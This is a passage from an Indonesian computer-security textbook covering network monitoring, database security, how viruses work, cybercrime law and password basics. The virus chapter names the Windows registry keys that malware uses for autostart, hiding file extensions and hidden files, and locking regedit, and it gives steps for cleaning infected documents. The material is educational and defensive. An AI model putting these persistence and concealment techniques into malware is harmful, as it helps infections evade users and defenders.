jaringan dapat terlihat bahwa ada yang mencoba mengakses melalui
tempat lain. Selain itu dengan pemantau jaringan dapat juga dilihat
usaha-usaha untuk melumpuhkan sistem dengan melalui denial of
service attack (DoS) dengan mengirimkan packet yang jumlahnya
berlebihan.

• Network monitoring biasanya dilakukan dengan menggunakan


protokol SNMP (Simple Network Management Protocol).

Keamanan Komputer 95
Program network monitoring / management :
• Etherboy (Windows), Etherman (Unix)
• HP Openview (Windows)
• Packetboy (Windows), Packetman (Unix)
• SNMP Collector (Windows)
• Webboy (Windows)

Program pemantau jaringan yang tidak menggunakan SNMP :


• iplog, icmplog, updlog, yang merupakan bagian dari paket iplog
untuk memantau paket IP, ICMP, UDP.
• iptraf, sudah termasuk dalam paket Linux Debian netdiag
• netwatch, sudah termasuk dalam paket Linux Debian netdiag
• ntop, memantau jaringan seperti program top yang memantau
proses di sistem Unix
• trafshow, menunjukkan traffic antar hosts dalam bentuk text-
mode

Keamanan Database

Penyerangan Database
• Informasi sensitif yang tersimpan di dalam database dapat terbuka
(disclosed) bagi orang-orang yang tidak diizinkan (unauthorized ).
• Informasi sensitif yang tersimpan di dalam database dapat altered in
an unacceptable manner
• Informasi sensitif yang tersimpan di dalam database dapat
inaccessible bagi orang-orang yang diizinkan.
• the underlying operating system may be attacked -- most difficult
problem

Database Inference Problem


• Malicious attacker may infer sensitive information (that is hidden)
from information on a database that is deemed not sensitive (made
public)
• More difficult problem: attacker may infer information combining
what’s on the database with what is already known

Database Aggregation Problem


• Bagian-bagian informasi tidak sensitive, dan menjadi sensitive ketika
digabungkan secara bersamaan.
• Controls for the aggregation problem

96 Keamanan Komputer
o Honeywell LOCK Data Views (LDV) database system ;
pieces of data labeled as nonsensitive, aggregates labeled as
sensitive
o SRI SeaView database system ; pieces of data labeled as
sensitive, aggregates may then be labeled as non sensitive

Polyinstantiation, a Control Against Disclosure


• This approach involves different views of a database object existing
for users with different security attributes
• Addresses the aggregation problem by providing different security
labels to different aggregates separately
• Addresses the inference problem by providing a means for hiding
information that may be used to make inferences

Database Applications on Secure Bases


• Most database applications rely on underlying services of an
operating system
• Exporting these services from a TCB would enhance the security
of the database
o database keys implemented using security labels from
underlying TCB
o TCB keeps audit records of operations on database
o OS file system protection extended to database

Keamanan Komputer 97
BAB 11
VIRUS
11.1. Pengertian Virus

Virus adalah program yang dibuat oleh seorang programmer dan


bersifat merusak. Virus menginfeksi file dengan ekstensi file tertentu,
.exe, .com, .txt, .jpg, dan lain sebagainya.

Tujuan :
1. Mengetahui dan Memahami apa yang di maksud dengan Virus
2. Mengetahui dan Memahami Jenis-Jenis Virus
3. Mengetahui dan Memahami Perbedaan Virus dengan Program
Komputer Lainnya
4. Mengetahui dan Memahami Struktur Virus
5. Mengetahui dan Memahami Cara Kerja Virus
6. Mengetahui dan Memahami Serangan Virus Ke Sistem Komputer
7. Mengetahui Tanda-tanda Komputer terinfeksi Virus

11.2. Jenis – jenis virus

a) Virus boot sector


Merupakan virus umum, menggandakan diri dengan cara menindih
bootsector asli pada sebuah disk, sehingga pada saat booting virus akan
langsung dijalankan ke memori.

b) Virus file
Menyerang file yang dijalankan oleh suatu sistem operasi. Biasanya
menyerang com atau exe.

c) Virus direct action


Virus ini akan masuk ke memori untuk menjalankan file lainnya. Lalu
menjalankan program lain untuk menipu.

d) Multi Partition virus


Merupakan gabungan dari virus boot sector dan virus file.

98 Keamanan Komputer
e) Polymorphic virus
Virus dirancang untuk mengelabui program AV yaitu dengan mengubah
struktur dirinya setelah menjalankan perintah

f) Stealth virus
Mengendalikan instruksi – instruksi level DOS dengan menguasai tabel
interrupt.

g) Macro virus
Ditulis oleh bahasa pemrograman dari suatu aplikasi, sehingga bersifat
platform independent.

11.3 Perbedaan virus dengan program komputer lainnya

Perbedaan virus dengan program aplikasi computer lainnya adalah :

1. Kemampuan mendapatkan informasi penting.

Virus didesain untuk menginfeksi banyak file atau program.


Misalnya, virus akan menulari seluruh file .txt atau .htt, maka virus
tersebut akan mencari informasi tentang file-file atau program -program
yang ada.
Setelah virus mendapatkan informasi tersebut, maka akan disimpan di
memory atau di suatu file tertentu yang telah di-set attributnya menjadi
hidden (tersembunyi).

2. Kemampuan untuk memeriksa program atau file

Ketika meninfeksi sebuah file, virus harus bias memeriksa apakah


file tersebut telah terinfeksi atau belum. Biasanya virus akan memeriksa
byte yang dipakai oleh virus tersebut, atau dengan nama lain penanda.
Apabila penanda tersebut telah ada maka virus tidak akan menginfeksi
file tersebut. Tetapi apabila file tersebut tidak ada penandanya, maka
virus akan menulari file yang sehat itu.

3. Kemampuan menggandakan diri

Kemampuan ini harus (wajib) dimiliki oleh virus, karena


kemampuan ini digunakan untuk perkembangbiakan virus tersebut.

Keamanan Komputer 99
Biasanya virus akan memasang penanda dan menyisipkan program untuk
memperbanyak virus tersebut.

4. Kemampuan untuk memanipulasi

Kemampuan ini digunakan untuk memunculkan pesan, gambar,


menghapus file, mencuri data/file, dan lain sebagainya.

5. Kemampuan untuk menyembunyikan diri dan data yang dibuat

Seluruh aktifitas yang dilakukan virus haruslah tidak kelihatan,


baik dari user ataupun dari komputer. Hal ini menjadi keindahan sebuah
virus. Biasanya kita bias melihat seluruh proses yang ada di computer
(khususnya yang berbasis Windows) hanya dengan menekan
Ctrl+Alt+Delete, maka akan muncul kotak yang berisikan proses-proses
yang berjalan pada
komputer. Sebuah virus yang bagus adalah yang tidak tertangkap
prosesnya oleh trapping tersebut. Apalagi jika dapat menghindari deteksi
sebuah antivirus.

11.4 Struktur Virus

Virus pada umumnya mempunyai struktur yang hampir sama, dan


dapat dibedakan menjadi beberapa kode, yaitu :

1. Kode penanda virus

Setiap virus pasti mempunyai identitas masing – masing. Bisa


dibuat dengan karakter atau jumlah byte tertentu sebagai marker sesuai
dengan keinginan si programmer. Contoh, virus A mempunyai pen anda
X dan virus B mempunyai penanda Y, maka virus-virus itu akan dikenali
antivirus sesuai penandanya. Pada virus hallo.roro.htt penandanya adalah
sebuah file desktop.ini yang mempunyai ukuran 299 byte, atau pada virus
w32.redlof.html mempunyai penanda file
folder.htt yang ada di tiap folder dengan ukuran 13 Kb.

2. Kode penggandaan virus

Suatu program tidak dapat dikatan virus jika tidak dapat


menggandakan dirinya sendiri. Contoh, virus hallo.roro.htt
100 Keamanan Komputer
menggandakan dirinya dengan memakai program syssrv.ex e. Hasil
penggandaan tersebut disimpan dalam file desktop.ini yang berukuran
299 byte dan hallo.roro.htt. Banyak cara atau jurus untuk menggandakan
diri yang digunakan oleh virus – virus sekarang.

3. Kode pertahanan dan penyembunyian deteksi

Kode ini diperlukan virus untuk mengecoh antivirus, bisa dengan


meng-encrypt file virus tersebut, me-nonvisiblekan proses pada komputer
korban, ataupun menampilkan pesan pengalihan ketika kita mencoba
menjalankan aplikasi antivirus.

4. Kode pemicu

Setiap virus mempunyai program atau kode untuk mengaktifkan


program utamanya. Program atau kode ini bisa dipicu dengan bermacam-
macam cara, contohnya, virus diaktifkan ketika kita mengklik atau
membuka file tertentu dari windows explorer. Atau dengan memakai
nama file yang sedang populer. Contoh, virus worm anna-kournikova
memakai kode pemicu dengan nama file anna-kournikova.jpg.exe.
dengan nama ini orang akan mengira file tersebut adalah .jpg (file
gambar), padahal file tersebut adalah file jenis application atau file .exe.
Atau virus w32.hllw.pesin, file pemicunya adalah SysTask.exe dengan
icon MS-Word. Sehingga orang terkecoh dan mengira bahwa
SysTask.exe merupakan file MS-Word.

5. Kode Manipulasi

Kode ini berguna untuk menghapus file, menjalankan aplikasi


tertentu untuk mencuri dan mengirimkan data ke sebuah email. Batasan
manipulasi terserah kepada pembuatnya, karena hal inilah maka virus
dikategorikan dalam program yang bersifat merusak. Dari kode - kode
diatas dapat dirangkum menjadi satu, sehingga menjadi sebuah prog ram
yang bernama virus.

11.5 Cara Kerja Virus

Cara kerja sebuah virus diterangkan sebagai berikut :

Keamanan Komputer 101


1. Setelah program virus diklik oleh user, maka virus akan menjalankan
proses.

2. Kemudian virus menjalankan kode pertahanan diri, yaitu dengan


menyembunyikan proses yang terjadi di komputer.

3. Lalu, seperti yang diterangkan pada ilustrasi gambar 11.1, virus akan
menjalankan kode penggandaan diri yaitu dengan mencari file
berekstensi tertentu (yang banyak digunakan oleh user komputer),
seperti .exe, .jpg, .doc, dan lain – lain. Misalnya virus menemukan file
yang bernama sehat.doc, selanjutnya virus akan memeriksa apakah
file tersebut ada kode penandanya.

Gambar 11. 1 Cara kerja Virus

4. Jika file tersebut tidak ada kode penanda maka virus akan menginfeksi
file yang sehat tersebut, atau menyisipkan kode virus seperti gambar
11.2 kemudian virus akan mencari file yang belum terinfeksi.

Gambar 11. 2 Virus mencari file lain setelah menulari file sehat

102 Keamanan Komputer


5. Jika virus tidak menemukan penanda pada file yang dicari, maka virus
akan mencari file selanjutnya yang belum terinfeksi.

6. Kemudian virus akan menjalankan kode manipulasi, entah menghapus


data, atau menjalankan kode penggandaan diri lagi.

7. Setelah kode – kode tersebut dijalankan virus akan mengerjakan kode


pertahanan kembali, yaitu dengan cara mengenkrip file virus untuk
menyembunyikan diri dari pendeteksian antivirus.

11.6 Serangan Virus ke Sistem Komputer

Virus pasti berusaha untuk masuk ke sistem yang ada di komputer


kita. Untuk mengunci sistem, memanipulasi dan mengganti sistem
tersebut agar virus dapat lebih leluasa berkembang biak.

Biasanya virus menyerang sistem yang ada di komputer kita yaitu:

Registry

Registry windows adalah suatu database untuk menyimpan dan mengatur


sistem di windows.
klik start -> run -> ketik ‘regedit’ (tanpa tanda petik), akan muncul
jendela seperti gambar di bawah ini :

Gambar 11.3: Gambar Registry Edit pada MS Windows

Keamanan Komputer 103


Key Registry

Key Registry dilambangkan dengan . Key Registry terdiri dari 5 Kunci


utama, yaitu:
- HKEY_CLASSES_ROOT atau biasa disingkat HKCR
- HKEY_CURRENT_USER atau biasa disingkat HKCU
- HKEY_LOCAL_MACHINE atau biasa disingkat HKLM
- HKEY_USERS atau biasa disingkat HKU
- HKEY_CURRENT_CONFIG atau biasa disingkat HKCC

Gambar 11.4: Key Registry Di Windows

Di tiap – tiap registry utama terdapat key utama terdapat key anak yang
berguna untuk menyimpan value.

Gambar 11.5: Key Registry HKEY_CURRENT_CONFIG yang


mempunyai key anak

104 Keamanan Komputer


Dari gambar di atas kita dapat melihat HKEY_CURRENT_CONFIG
mempunyai anak yaitu:
- Key Software
- Key Sytem
Dan Key System mempunyai anak lagi yaitu :
- Current Control Set
Kemudian Key Current Control Set mempunyai anak lagi:
- Key Control
- Key Enum

Value

Value di sini adalah isi dari key yang ada di registry windows.
Gambar di bawah ini hanyalah contoh dari value :

Gambar 11.6: Contoh dari value registry

Value terbagi 3 jenis yaitu:


- DWORD dengan jenis angka atau integer
- STRING dengan jenis karakter (huruf) atau kalimat
- BINARY dengan jenis angka biner

Sebenarnya ada jenis – jenis lain tetapi jarang dipakai dalam registry itu
sendiri.

Alamat Registry

Registry sendiri mempunyai alamat yang berguna untuk mengatur


konfigurasi pada windows, misalnya:

Keamanan Komputer 105


Alamat registry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersio
n\Run\
Berguna untuk menjalankan suatu aplikasi secara otomatis

Alamat registry:
HKEY_CURRENT_USER
\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
Berguna untuk memanipulasi kode explorer

Alamat registry:
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentV
ersion\
Berguna untuk memanipulasi drive penginstalan, Lisensi pada Windows.

Registry pemicu virus

Registry pemicu ini berguna untuk memicu file virus, sehingga virus
otomatis akan aktif jika windows masuk.

Alamat:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\

Di sini neh biasanya virus bercokol, maksudnya di alamat registry ini


biasanya digunakan oleh programmer virus untuk memicu program
virusnya secara otomatis.

Misalnya pada virus kangen alamat registry :


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current
Version\Run
Di isi oleh string NvsSchd, sehingga terlihat seperti pada gambar di
bawah ini:

Gambar 11.7: Pemicu registry pada virus kangen

106 Keamanan Komputer


Registry penyembunyian Extensi file

Pada alamat registry ini biasanya digunakan untuk menyembunyikan


extensi file.

Gambar 11.8 : Extensi file terlihat di Windows Explorer

Pada gambar 11.8 Extensi file masih dapat terlihat, Yaitu file winword
dengan extensi file ICO dan file wepkeys dengan extensi f ile txt.
Biasanya virus menyembunyikan extensi file tersebut, agar user tertipu,
seperti yang dilakukan oleh w32.rontokbro atau w32.kangen, dan virus
lainnya.

Alamat:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advance
d\
Key : HideFileExt
Value : 1
Jika extensi file disembunyikan, maka terlihat akan seperti pada gambar
berikut:

Gambar 11.9 Extensi file tidak terlihat di Windows Explorer

Keamanan Komputer 107


Extensi file winword dan wepkeys tidak terlihat.

Registry penyembunyian file yang beratribut hidden

Alamat registry ini berguna untuk menyembunyikan file yang ber artribut
hidden. Jadi untuk mempertahankan kelangsungan hidupnya, virus
menyembunyikan diri dengan mengeset file beratribut hidden. Walaupun
sebenarnya ada tehnik lain, yaitu dengan membuat nama file utama virus
mirip dengan nama system file di windows, misalnya :
- Pada virus brontok menggunakan nama file svchost, lsass, csrss, dan
lain – lain, nama file tersebut mirip dengan nama file system yang ada
pada windows.
- Pada virus riyani_jangkaru menggunakan nama file xpshare
- Pada virus kangen nama file virusnya adalah NvsScd
Alamat registry untuk menyembunyikan file yang beratribut hidden
tersebut adalah:
Alamat:
HKCU\Software\Microsoft\Windows\CurrentVersion\Expl
orer\Advanced\
Key : Hidden
Value : 0
Untuk jelasnya, coba lihat gambar berikut ini :

Gambar 11.10: File beratribut hidden

File yang beratribut hidden pada windows explorer ditandai dengan icon
yang kabur. File tersebut dapat disembunyikan dengan alamat registry di
atas tadi. Sehingga pada windows explorer nanti file msdos.sys tidak

108 Keamanan Komputer


akan terlihat File virus tidak akan terlihat karena file tersebut di-set
dengan atribut hidden.

Jika kalian tidak menemukan file virus yang beratribut hidden, ubah
value pada registry tersebut dengan nilai 1.

Registry Pengunci regedit (Registry Edit)

Registry ini berguna untuk mengunci regedit yang ada di windows.


Sehingga bila kita mencoba masuk ke registry, maka akan timbul pesan
sbb :

Gambar 11.11: Pesan kalau registry edit telah terkunci

Alamat :
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\
Key : DisableRegistryTools
Value : 1

Agar regedit dapat dibuka kembali ubah hapus nilai registry tersebut.

SYSTEM EDITOR (SYSEDIT)


Selain virus menyerang daerah registry, virus juga men yerang
Sysedit atau sistem editor yang ada di MS Windows
System Editor atau yang biasa disingkat dengan Sysedit adalah
file – file tertentu yang dijalankan ketika komputer masuk ke windows
pertama kali. Ya seperti regedit. Sysedit ini biasanya masih banyak
dipakai di Sistem Operasi Windows lama seperti win95, Win98, Win
3.1…jadi walaupun memang sudah lama…tapi secara tidak langsung
berpengaruh juga pada user yang memakai Sistem Operasi Windows XP.
Coba untuk melihat sysedit klik Start->Run -> Ketik sysedit . Maka akan
muncul seperti pada gambar berikut ini…

Keamanan Komputer 109


Gambar 11.12: Sysedit (System Editor) pada Windows

Jadi sebenarnya dalam sysedit ini kita bisa memanipulasi file yang
pertama kali dieksekusi oleh windows ketika windows berjalan di
computer anda.

File – file tersebut adalah :

- Config.sys
Config.sys adalah file yang memuat tentang seluruh konfigurasi windows
dan dijalankan ketika pertama kali windows mulai. Letak file ada di drive
C:\ dan mempunyai atribut file system dan hidden.

- Autoexec.bat
Autoexec.bat adalah file yang berisi perintah yang ada di komputer dan
akan dijalankan pertama kali ketika windows berjalan. Letak f ile ada di
drive C:\ dan mempunyai atribut file system dan hidden. Coba Untuk
membuktikannya, buka file Autoexec.bat ini kemudian ketik:
Dir c: > c:\coba.txt
Lalu simpan dan restart komputer anda, apa yang terjadi? Nah coba cek
di drive c: di komputer anda, pasti ada file coba.txt, karena pada perintah
di atas autoexec.bat menjalankan perintah windows yaitu ‘dir’ dan
menyimpannya ke file coba.txt di drive c.

110 Keamanan Komputer


- Win.ini
Win.ini juga sebuah file yang dieksekusi pertama kali oleh windows. File
ini berisi tentang aplikasi 16 bit yang di-support oleh windows.

- System.ini
System.ini adalah sebuah file yang berguna untuk menyimpan da ta f ont
yang diakses oleh
windows ketika pertama kali.

MSCONFIG

MSCONFIG sebenarnya sebuah aplikasi, nah dari aplikasi


MSCONFIG, seluruh file system editor (sysedit) tadi dijalankan. Coba
sekarang klik Start-> Run -> ketik msconfig kemudian enter. Maka a kan
muncul apliaksi seperti pada gambar berikut :

Gambar 11.13: MSCONFIG pada Windows

klik salah satu bar yang ada di aplikasi MSCONFIG tersebut. Misalnya
klik bar ‘SYSTEM.INI’ maka akan muncul gambar seperti di bawah ini
kan:

Keamanan Komputer 111


Gambar 11.14: Bar SYSTEM.INI yang ada di MSCONFIG

daftar file yang dijalankan oleh SYSTEM.INI ketika windows berjalan


pertama kali.
Tapi para virus biasanya menggunakan MSCONFIG ini untuk
menjalankan program virus mereka secara otomatis, yaitu dengan
memanipulasi bar startup.
Misalnya virus hallo.roro.htt memanipulasi startup dengan memberi cara
menulis script di startup:
load = c:\windows\system\syssrv.exe
Maka di aplikasi MSCONFIG pada bar Startup akan muncul
penampakkan seperti pada gambar berikut:

Gambar 11.15: Virus hallo.roro.htt pada msconfig di bar startup

112 Keamanan Komputer


DIREKTORI – DIREKTORI YANG SERING MENJADI INCARAN
VIRUS

c:\windows terkadang juga di


c:\windows\system32

11.7 Tanda – tanda komputer anda terinfeksi virus adalah:

1. Tidak lengkapnya fasilitas pada tombol start, jadi seharusnya, ketika


kita sedang meng-klik tombol “start”, maka yang muncul seperti pada
gambar berikut:

Gambar 11.16: Fasilitas yang ada di tombol “start”

Seperti pada gambar, tombol start yang diklik akan muncul fasilitas,
Control Panel, My Document, My Computer, Search, Run, Log of f dan
Shut Down.
Sedangkan jika komputer terkena virus, maka tombol startnya akan
seperti ini:

Keamanan Komputer 113


Gambar 11.17: Fasilitas tombol “start” tidak lengkap

Gambar diatas adalah gambar tombol start yang terkena virus, yaitu tidak
adanya “Control Panel”, “search” dan “Run”.

2. Jika ditekan tombol ctrl+alt+del , maka computer normal akan muncul


tasklist, atau daftar process yang ada di komputer.

Sedangkan pada komputer yang terkena virus, ketika menekan tombol


ctrl+alt+del, maka akan muncul pesan sbb:

Gambar 11.18: tasklist yang diblok oleh virus

114 Keamanan Komputer


3. Ketika menekan tombol windows+R , seharusnya muncul:

Gambar 11.19: kotak Run

Tetapi jika terkena virus, maka yang muncul adalah:

Gambar 11.20:
Pesan yang dimunculkan virus ketika mengeblok kotak Run

4. Di windows explorer, seharusnya ada sub menu folder option:

Gambar 11.21: Folder Option

Keamanan Komputer 115


Tapi jika terkena virus, maka “Folder Option” tidak akan muncul

Gambar 11.22: Folder Option di blok oleh virus

11.8 Cara Memperbaiki File doc yang termanipulasi karena virus

Proses memperbaikinya gampang, dengan catatan file virus harus


dinonaktifkan dulu, tetapi terkadang antivirus komersial tidak mau
memperbaiki file yang telah disisipi virus, untuk itu ikuti langkah di
bawah ini:
1. Donlot HEDIT, cari aja di google dengan kata kunci HEDIT,
Download ... kemudian install.
2. Ubah file yang tadinya berekstensi src menjadi doc, tetapi dengan
nama yang beda, misalnya file yang terkontaminasi bernama susi.scr
maka ubah namanya menjadi susi1.doc.
3. kemudian buka file yang telah diubah namanya tersebut dengan
HEDIT. maka akan muncul gambar sebagai berikut:

Gambar 11.23: File Yang dibuka dengan HEDIT

116 Keamanan Komputer


4. Blok dari alamat 00000000 sampai 0000B600 atau terletak pada
signature awal dan D0 CF 11
E0 A1 B1 1A E1 dan kursor harus terletak di tanda hitam seperti pada
gambar berikut:

Gambar 11.24: Blok Alamat Sesuai Kursor, Perhatikan Kursor

5. Kemudian tekan tombol DEL atau ke klik ke menu EDIT dan klik
DELETE, maka akan
muncul kotak pesan sbb:

Gambar 11.25: Kotak konfirmasi

6. Klik Yes aja, Kemudian tekan tombol ALT + S untuk meyimpan hasil
kerjaan kita.
7. Buka aja file doc yang sudah diedit tadi.

Keamanan Komputer 117


BAB 12
CYBER CRIME
(Tinjauan regulasi kejahatan di internet)

12.1 Pengertian Cyber Crime

Cyber Crime adalah tidak kriminal yang dilakukan dengan


menggunakan teknologi computer sebagai alat kejahatan utama.
Cybercrime merupakan kejahatan yang memanfaatkan perkembangan
teknologi computer khusunya internet.

Cyber crime didefinisikan sebagai perbuatan melanggar hukum


yang memanfaatkan teknologi computer yang berbasis pada kecanggihan
perkembangan teknologi internet.

Tujuan :
1. Mengetahui dan Memahami Apa yang dimaksud dengan Cyber
Crime
2. Mengetahui dan Memahami Karakteristik, Klasifikasi dan Jenis -
Jenis Cyber Crime
3. Mengetahui Tinjauan Hukum Cyber Crime

12.2 Karakteristik
• Ruang lingkup kejahatan
• Sifat kejahatan
• Pelaku kejahatan
• Modus kejahatan
• Jenis kerugian yang ditimbulkan

Dari beberapa karakteristik diatas, untuk mempermudah penanganannya


maka cybercrime diklasifikasikan :
• Cyberpiracy
• Cybertrespass
• Cybervandalism

Perkiraan perkembangan cyber crime di masa depan


• Denial of Service Attack
• Hate sites
• Cyber Stalking
118 Keamanan Komputer
Jenis-jenis cybercrime berdasarkan motif

• Cybercrime sebagai tindak kejahatan murni


• Cybercrime sebagai tindakan kejahatan abu-abu
• Cybercrime yang menyerang individu
• Cybercrime yang menyerang hak cipta (Hak milik)
• Cybercrime yang menyerang pemerintah

12.3 Jenis – Jenis Cyber Crime

• Fraud
Adalah sejenis manipulasi informasi keuangan dengan tujuan untuk
mengeruk keuntungan sebesar-besarnya.
• PHISING
Phising adalah kegiatan memancing pemakai komputer di internet
(user) agar mau memberikan informasi data diri pemakai (username)
dan kata sandinya (password) pada suatu website yang sudah di-
deface.
• SPAMMING
Spamming adalah pengiriman berita atau iklan lewat surat elektronik
(e-mail) yang tak dikehendaki.
• MALWARE
Malware adalah program komputer yang mencari kelemahan dari
suatu software
• DEFACING
Defacing adalah kegiatan mengubah halaman situs/website pihak
lain,

12.4 Jenis - Jenis Kejahatan Cyber yang lain

Jenis Kasus Cyber Crime di Indonesia


• Pencurian dan penggunaan account Internet milik orang lain.
• Membajak situs web.
• Denial of Service (DoS) dan Distributed DoS (DDos) attack.
• Kejahatan yang berhubungan dengan nama domain.

Keamanan Komputer 119


Jenis – Jenis Kejahatan Cyber yang lain

Contoh Kasus Yang Pernah Terjadi

• P embajakan Web KPU Tahun 2004 dan 2009


• Pembajakan Situs Depkominfo
• Pembajakan situs Komisi Hukum Nasional Republik Indonesia
• Pembajakan situs PDAM Kota Denpasar Bali

Ini ada juga daftar beberapa situs yang di deface menjelang HUT RI
tahun 2007 :

• Pebobolan kartu Kredit melalui Internet yang dilakukan oleh Petrus


Pangkur dengan hukuman 1 tahun penjara karena melakukan
penipuan dan pemalsuan kertu kredit milik orang lain untuk membeli
barang. Pada tahun 2002.

• Steven Haryono dengan cara menipu pelanggan BCA dengan


memlesetkan www.clickbca.com , dengan tujuan kita melek terhadap
internet banking. Diperoleh 130 PIN milik pengunjung yang tidak
sadar teresat. Namun tidak terkena jerat hukum. Pada tahun 2001.

• Ramdoni dan Yanti tertangkap melakukan perdagangan wanita ilegal


dengan melalui situs web. Pada tahun 2004.

• Johnny Indrawan Yusuf menjual VCD porno melalui situs internet


di daerah Waru Sidoharjo, Jawa Timur melalui situs WEB, dengan
melalui transfer ATM. Pada tahun 2004

• Pada awal tahun 2002, Gartner IncH, (www.gartner.com) mengalami


kerugian dari nilai transaksi US$ 700.000.000 hilang sepanjang tahun
2001 akibad fraud. Kerugian itu sebesar US $ 61,8 Milyar atau 19
kali lebih tinggi dari kerugian via off line.

Demikianlah beberapa contoh kasus cyber crime di Indonesia meski


banyak kasus lain yang sudah diselesaikan secara hukum atau belum
terselesaikan dan hanya menjadi polemik saja.

120 Keamanan Komputer


Solusi atau Penanggulangan

Ada banyak cara yang dapat di lakukan, antara lain :


• Penegakkan hukum dengan landasan UU ITE
• Sosialisasi di instansi – instansi baik di pemerintahan, perkantoran
maupun di sekolah - sekolah tentang kejahatan cyber
• Memperkuat system keamanan ( security system )
• Melakukan modernisasi hukum pidana material dan hukum acara
pidana.
• Mengembangkan tindakan-tindakan pencegahan dan pengamanan
komputer.
• Melakukan langkah-langkah untuk membuat peka warga masyarakat,
aparat pengadilan dan penegak hukum, terhadap pentingnya
pencegahan kejahatan yang berhubungan dengan komputer.
• Melakukan upaya-upaya pelatihan (training) bagi para hakim, pejabat
dan para penegak hukum mengenai kejahatan ekonomi dan cyber
crime.
• Memperluas rules of ethics dalam penggunaan komputer dan
mengajarkannya melalui kurikulum informatika.
• Mengadopsi kebijakan perlindungan korban Cyber Crime sesuai
dengan deklarasi PBB mengenai korban, dan mengambil langkah -
langkah untuk korban melaporkan adanya cyber crime.

12.5 Tinjauan Hukum

• Kejahatan yang berhubungan dengan komputer (computer


crime) memerlukan ketentuan khusus dalam KUHP atau undang-
undang tersendiri yang mengatur tindak pidana dibidan komputer

• Di Indonesia sendiri, setidaknya sudah terdapat Undang-


Undang no. 11 tahun 2008 tentang Informasi dan Transaksi
Elektronik yang di gawangi oleh Direktorat Aplikasi
Telematika Departemen Komunikasi dan Informatika.
Subyek-subyek muatannya ialah menyangkut masalah
yurisdiksi, perlindungan hak pribadi, azas perdagangan
secara e-comerce, azas persaingan usaha tidak sehat dan
perlindungan konsumen, azas hak atas kekayaan intelektual
(HaKI) dan hukum Internasional serta azas Cyber Crime

Keamanan Komputer 121


• Ada beberapa aturan yang bersentuhan dengan dunia cyber
yang dapat digunakan untuk menjerat pelaku cyber crime,
sehingga sepak terjang mereka makin sempit. Peraturan-
peraturan khusus itu adalah, sebagai berikut :
1. Undang-Undang Nomor 36 tahun 1999 tentang
Telekomunikasi.
2. Undang-Undang Nomor 5 tahun 1999 tentang
Larangan Praktek Monopoli dan Persaingan Usaha
Tidak Sehat.
3. Undang-Undang Nomor 8 tahun 1999 tentang
Perlindungan Konsumen.
4. Undang-Undang Nomor 19 tahun 2002 tentang Hak
Cipta.
5. Undang-Undang Nomor 14 tahun 2001 tentang Hak
Paten.
6. Undang-Undang Nomor 15 tahun 2001 tentang Merk.

Dan untuk aturan yang di muat dalam UU ITE rangkumannya Sbb:

• Tanda tangan elektronik memiliki kekuatan hukum yang sama


dengan tanda tangan konvensional (tinta basah dan bermaterai).
Sesuai dengan e-ASEAN Framework Guidelines (pengakuan tanda
tangan digital lintas batas)
• Alat bukti elektronik diakui seperti alat bukti lainnya yang diatur
dalam KUHP
• UU ITE berlaku untuk setiap orang yang melakukan perbuatan
hukum, baik yang berada di wilayah Indonesia maupun di luar
Indonesia yang memiliki akibat hukum di Indonesia
• Pengaturan nama domain dan Hak Kekayaan Intelektual
• Perbuatan yang dilarang (cybercrime) dijelaskan pada Bab VII (pasal
27-37) :

Dan untuk aturan yang di muat dalam UU ITE rangkumannya Sbb:


1. Pasal 27 (Asusila, Perjudian, Penghinaan, Pemerasan)
2. Pasal 28 (Berita Bohong dan Menyesatkan, Berita Kebencian dan
Permusuhan)
3. Pasal 29 (Ancaman Kekerasan dan Menakut-nakuti)
4. Pasal 30 (Akses Komputer Pihak Lain Tanpa Izin, Cracking)

122 Keamanan Komputer


5. Pasal 31 (Penyadapan, Perubahan, Penghilangan Informasi)
6. Pasal 32 (Pemindahan, Perusakan dan Membuka Informasi
Rahasia)
7. Pasal 33 (Virus?, Membuat Sistem Tidak Bekerja (DOS?))
8. Pasal 35 (Menjadikan Seolah Dokumen Otentik (phising?)

Keamanan Komputer 123


BAB 13
PASSWORD

13.1. Pengertian Password

Password adalah suatu bentuk dari data otentikasi rahasia yang


digunakan untuk mengontrol akses ke dalam suatu sumber informasi.
Password akan dirahasiakan dari mereka yang tidak diijinkan untuk
mengakses, dan mereka yang ingin mengetahui akses tersebut akan diuji
apakah layak atau tidak untuk memperolehnya.
Walaupun demikian, password bukan berarti suatu bentuk kata-
kata; tentu saja password yang bukan suatu kata yang mempunyai a rti
akan lebih sulit untuk ditebak. Sebagai tambahan, password sering
digunakan untuk menggambarkan sesuatu yang lebih tepat disebut pass
phrase. Password kadang-kadang digunakan juga dalam suatu bentuk
yang hanya berisi angka (numeric); salah satu contohnya adalah Personal
Identification Number (PIN). Password umumnya cukup pendek
sehingga mudah untuk diingat.

Tujuan :
1. Mengetahui dan Memahami Apa yang dimaksud dengan
Password
2. Mengetahui Perkembangan Password
3. Mengetahui dan Memahami upaya untuk mengamankan proteksi
password
4. Mengetahui dan Memahami Kebijakan Pengamanan
5. Mengetahui dan Memahami Kesalahan utama para pengguna
password
6. Mengetahui dan Memahami Penggunaan Password yang baik

13.2. Perkembangan Password

Perkembangan otentikasi password ini dapat dilihat dengan


contoh-contoh dari kelemahan, sistem yang mudah dibahayakan, yang
kebanyakan masih digunakan sampai saat ini. Dibawah ini akan
diperlihatkan beberapa kategori utama dari sistem otentikasi password,
bersamaan dengan beberapa contoh implementasi yang mengilustrasikan
kekurangan masing masing :

124 Keamanan Komputer


1) Otentikasi Lemah (Weak Authentication)
Secara umum, sistem dengan otentikasi yang lemah dicirikan dengan
protokol yang memiliki kebocoran password langsung diatas jaringan
atau membocorkan informasi yang cukup untuk diketahui ‘penyerang’
sehingga password dapat dianalisis dan ditebak.
• Cleartext Passwords
Metode otentikasi yang paling tidak aman adalah menyimpan password
pada database di suatu tempat di server. Selama otentikasi, user
mengirim password langsung ke server dan server akan membandingkan
dengan password yang ada di server. Masalah keamanan disini sangat
jelas terlihat.
• Hashed Passwords
Password pengguna dapat dijalankan melalui suatu fungsi one-way hash,
dimana dapat mengubahnya ke dalam urutan byte secara acak. Sebagai
fungsi ini akan lebih susah dikembalikkan: lebih mudah mengubah
